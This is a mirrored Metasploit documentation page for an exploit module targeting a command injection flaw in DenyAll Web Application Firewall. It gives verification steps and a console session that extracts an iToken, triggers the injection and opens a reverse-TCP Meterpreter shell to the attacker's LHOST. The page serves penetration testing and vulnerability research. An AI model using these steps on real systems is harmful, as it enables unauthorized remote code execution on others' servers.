CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/http/denyall_waf_exec.md
Views: 1904

Vulnerable Application

This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.

It's possible to have trial demo for 15 days at Amazon Marketplace. https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911

You just need to follow instruction above URL.

Verification Steps

A successful check of the exploit will look like this:

  • Start msfconsole

  • use use exploit/linux/http/denyall_exec

  • Set RHOST

  • Set LHOST

  • Run check

  • Verify that you are seeing The target appears to be vulnerable.

  • Run exploit

  • Verify that you are seeing iToken value extraction.

  • Verify that you are getting meterpreter session.

Scenarios

msf > use exploit/linux/http/denyall_exec 
msf exploit(denyall_exec) > 
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit 

[*] Started reverse TCP handler on 35.12.3.3:4444 
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Triggering command injection vulnerability with  iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300

meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >